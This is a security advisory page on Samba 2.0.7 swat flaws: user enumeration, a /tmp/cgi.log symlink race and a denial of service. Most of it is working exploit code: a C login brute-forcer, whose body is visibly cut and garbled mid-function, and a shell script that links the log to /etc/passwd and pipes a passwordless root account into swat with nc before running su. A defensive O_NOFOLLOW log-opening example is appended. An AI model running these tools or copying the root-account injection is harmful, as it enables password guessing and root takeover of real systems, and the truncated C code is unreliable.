
Multiple serious vulnerabilities in swat on Linux

Date: 2017/2/27 14:24:32   Editor: More Linux
Affected versions:
  Samba 2.0.7

Unaffected versions:
  Samba 2.0.9

Vulnerability description:

swat is a service process shipped with Samba 2.0 and later that lets the administrator configure and manage the Samba server through a web interface. The swat service in Samba 2.0.7 contains several vulnerabilities that seriously endanger system security.

(1) Possible disclosure of system usernames and passwords.
When a user opens the swat page, swat prompts for a username and password. When a non-existent username is entered, swat answers:
  401 Bad Authorization
  username/password must be supplied
But when the username is correct and the password wrong, swat pauses for two seconds and then answers:
  401 Authorization Required
  You must be authenticated to use this service.
From these different responses an attacker can learn which usernames exist on the system and then go on to guess that user's password. Because swat does not enable logging by default, the attack is not recorded; if swat's logging is enabled, the same request path leads directly to vulnerability 2. (Test code one)

(2) Local privilege escalation
swat does not enable logging by default. When logging is enabled, swat does not check whether the log file already exists before it writes arbitrary client-supplied input into it, so a local malicious user can overwrite important system files through a temporary-file race.
Example:
  [email protected]$ ln -s /etc/passwd /tmp/cgi.log     # first create the link
  [email protected]$ telnet localhost 901                 # then connect to port 901 (swat):
  toor::0:0::/:/bin/bash                                # type the line above, then close the connection with ctrl^] and "quit"
  [email protected]$ cat /etc/passwd                     # inspect /etc/passwd
  [Date: Mon, 31 Oct 2000 22:19:58 GMT localhost.localdomain (127.0.0.1)] toor::0:0::/:/bin/bash
  [email protected]$ su
The malicious user now has root privileges. (Test program two)

(3) Denial of service
If an incorrect URL such as hostname:901?badfile is requested at login together with a wrong username and password, swat answers "Authentication Required" and inetd restarts swat. If the client is the Netscape browser, Netscape immediately retries the URL, and eventually inetd disables the swat service for a long time.

Test method: (The programs and methods below may be offensive in nature; if you use them for illegal purposes, you bear the consequences yourself!)
---------------------------* swat_test1.c *----------------------------------
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

#define SWAT_PORT 901
#define MAX_NAME_SIZE 16
#define MAX_PASS_SIZE 16
#define CHECK_PASSWORD "centerfield"
#define USER_AGENT "super-hyper-alpha-pickle-2000"

struct VALID_NAMES {
    char *name;
    struct VALID_NAMES *next;
};

/* store a name in the current tail node and return a fresh, empty tail */
struct VALID_NAMES *add_to_names(struct VALID_NAMES *list, char *name)
{
    list->name=(char *)malloc(MAX_NAME_SIZE);
    memcpy(list->name, name, MAX_NAME_SIZE);
    list->next=(struct VALID_NAMES *)malloc(sizeof(struct VALID_NAMES));
    list=list->next;
    memset(list, 0, sizeof(struct VALID_NAMES));
    return(list);
}

/* remove the trailing newline left behind by fgets() */
void chop(char *str)
{
    int x;

    for(x=0;str[x]!='\0';x++)
        if(str[x]=='\n') {
            str[x]='\0';
            return;
        }
    return;
}

/* encode "user:pass" for the HTTP Basic Authorization header */
char *base64_encode(char *str)
{
    char *b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    int x, y, total;
    unsigned char *output;

    output=(unsigned char *)malloc(strlen(str)*2);
    memset(output, 0, strlen(str)*2);

    /* every full group of 3 input bytes becomes 4 six-bit values */
    for(x=0, y=0; x+3<=(int)strlen(str); x+=3, y+=4) {
        output[y] = str[x] >> 2;
        output[y+1] = str[x] << 6;
        output[y+1] = output[y+1] >> 2;
        output[y+1] = output[y+1] | (str[x+1] >> 4);
        output[y+2] = str[x+1] << 4;
        output[y+2] = output[y+2] >> 2;
        output[y+2] = output[y+2] | (str[x+2] >> 6);
        output[y+3] = str[x+2] << 2;
        output[y+3] = output[y+3] >> 2;
    }

    /* 64 indexes the '=' padding character */
    if(strlen(str)%3 == 1) {
        output[y]=str[x] >> 2;
        output[y+1]=str[x] << 6;
        output[y+1]=output[y+1] >> 2;
        output[y+2]=64;
        output[y+3]=64;
    }

    if(strlen(str)%3 == 2) {
        output[y]=str[x] >> 2;
        output[y+1]=str[x] << 6;
        output[y+1]=output[y+1] >> 2;
        output[y+1]=output[y+1] | (str[x+1] >> 4);
        output[y+2]=str[x+1] << 4;
        output[y+2]=output[y+2] >> 2;
        output[y+3]=64;
    }

    /* translate by count, so a six-bit value of 0 ('A') does not end early */
    total = y + (strlen(str)%3 ? 4 : 0);
    for(x=0 ; x < total ; x++)
        output[x] = b64[output[x]];

    output[total]='\0';
    return((char *)output);
}

/* 0: unknown user, 1: user exists but password wrong, 2: login accepted */
int check_user(char *name, char *pass, struct hostent *he)
{
    char buf[8192]="";
    char buf2[1024]="";
    char *auth;
    int s;
    struct sockaddr_in s_addr;

    memset(buf, 0, sizeof(buf));
    memset(buf2, 0, sizeof(buf2));

    s_addr.sin_family = PF_INET;
    s_addr.sin_port = htons(SWAT_PORT);
    memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr));

    if((s=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        fprintf(stderr, "cannot create socket\n");
        exit(-1);
    }

    if(connect(s, (struct sockaddr *) &s_addr, sizeof(s_addr))==-1) {
        fprintf(stderr, "cannot connect\n");
        exit(-1);
    }

    chop(name);
    chop(pass);
    sprintf(buf2, "%s:%s", name, pass);
    auth=base64_encode(buf2);
    sprintf(buf, "GET / HTTP/1.0\r\n"
                 "Connection: Keep-Alive\r\n"
                 "User-Agent: %s\r\n"
                 "Authorization: Basic %s\r\n\r\n",
            USER_AGENT, auth);
    free(auth);

    if(send(s, buf, strlen(buf), 0) < 1) {
        perror("send: ");
        exit(1);
    }

    memset(buf, 0, sizeof(buf));
    if(recv(s, buf, sizeof(buf)-1, 0) < 1) {
        perror("recv: ");
        exit(1);
    }

    buf[sizeof(buf)-1]='\0';

    if(strstr(buf, "HTTP/1.0 401 Authorization Required") != NULL) {
        close(s);
        return 1;
    } else if(strstr(buf, "HTTP/1.0 401 Bad Authorization") != NULL) {
        close(s);
        return 0;
    } else if(strstr(buf, "HTTP/1.0 200 OK") != NULL) {
        close(s);
        return 2;
    } else {
        printf("Unknown result: %s\n", buf);
        exit(1);
    }
}

void usage(void)
{
    printf("\nUsage: flyswatter [-a] -t target -n namefile -p passwordfile\n");
    printf("\t-a: Do not verify that users exist.\n");
    exit(1);
}

int main(int argc, char** argv)
{
    int x, y, z;
    int s;
    char buf[MAX_NAME_SIZE]="";
    FILE *pfile, *nfile;
    struct hostent *he;
    struct VALID_NAMES *valid_names;
    struct VALID_NAMES *list_walk;

    int tryall=0;
    char target[1024]="";
    char namefile[512]="";
    char passwordfile[512]="";

    valid_names=(struct VALID_NAMES *)malloc(sizeof(struct VALID_NAMES));
    list_walk=valid_names;
    memset(valid_names, 0, sizeof(struct VALID_NAMES));

    /* [the page's copy of the program is cut here: option parsing, opening the
       name and password files and the username-check loop are missing; only
       the tail below survives] */
    if(argcnext != 0) {
        fseek(pfile, 0, SEEK_SET);
        while(fgets(buf, sizeof(buf), pfile)!=NULL) {
            if(check_user(valid_names->name, buf, he)==2)
                printf("valid username/password: %s:%s\n", valid_names->name, buf);
        }
        valid_names=valid_names->next;
    }

    printf("Finished.\n");
    exit(0);
}

------------------------------* swat_test2.sh----------------------------------
#!/bin/sh
# swat for samba 2.0.7 compiled with cgi logging exploit
# discovered by miah [email protected]
# exploit by optyx [email protected]
if [ -f /tmp/cgi.log ]; then
    if [ `rm -f /tmp/cgi.log` ]; then
        echo "/tmp/cgi.log exists and cannot be deleted"
        exit
    fi
fi
echo "backing up /etc/passwd"
cp -pd /etc/passwd /tmp/.bak
touch -r /etc/passwd /tmp/.bak
ln -s /etc/passwd /tmp/cgi.log
echo "connecting to swat"
echo -e "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash\n" | nc -w 1 localhost swat
if [ `su -l uberhaxr -c "cp /bin/bash /tmp/.swat"` ]; then
    echo "exploit failed"
    rm /tmp/.bak
    rm /tmp/cgi.log
    exit
fi
su -l
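The defensive counterpart to vulnerability (2), added here as an example and not code from this page or from Samba: a log-file open routine that refuses to follow a symlink such as /tmp/cgi.log -> /etc/passwd and double-checks what it opened, demonstrated in a private temporary directory against a constructed stand-in file (the directory, file names and function names are assumptions).

```c
#define _GNU_SOURCE            /* O_NOFOLLOW and mkdtemp on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Open or create a log file for appending without following a symlink at
 * the final path component, then verify the object actually opened is a
 * plain file that we own and that has no extra hard links. fd or -1. */
int open_log_safely(const char *path)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd == -1)
        return -1;                 /* ELOOP here: the path is a symlink */
    struct stat st;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Demo in a private temp dir: "passwd_copy" (constructed) stands in for
 * /etc/passwd and "cgi.log" is a symlink to it, as in the page's example.
 * Returns 1 if the symlink is refused, the stand-in stays untouched and an
 * ordinary log file is still accepted. */
int demo_symlink_defence(void)
{
    char dir[] = "/tmp/swatdemoXXXXXX", target[256], link[256], plain[256];
    const char *orig = "root:x:0:0:root:/root:/bin/bash\n"; struct stat st; int fd, ok = 1;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/passwd_copy", dir);
    snprintf(link, sizeof link, "%s/cgi.log", dir);
    snprintf(plain, sizeof plain, "%s/real.log", dir);
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd == -1 || write(fd, orig, strlen(orig)) < 0 || symlink(target, link))
        return 0;
    close(fd);
    if ((fd = open_log_safely(link)) != -1) { ok = 0; close(fd); }   /* attack */
    if ((fd = open_log_safely(plain)) == -1) ok = 0;                  /* honest */
    else { if (write(fd, "entry\n", 6) != 6) ok = 0; close(fd); }
    if (stat(target, &st) || st.st_size != (off_t)strlen(orig)) ok = 0;
    unlink(link); unlink(target); unlink(plain); rmdir(dir);
    return ok;
}
```

Running the demo with the plain O_CREAT open that swat used instead of O_NOFOLLOW shows the difference: the symlink is silently followed and the stand-in file is appended to.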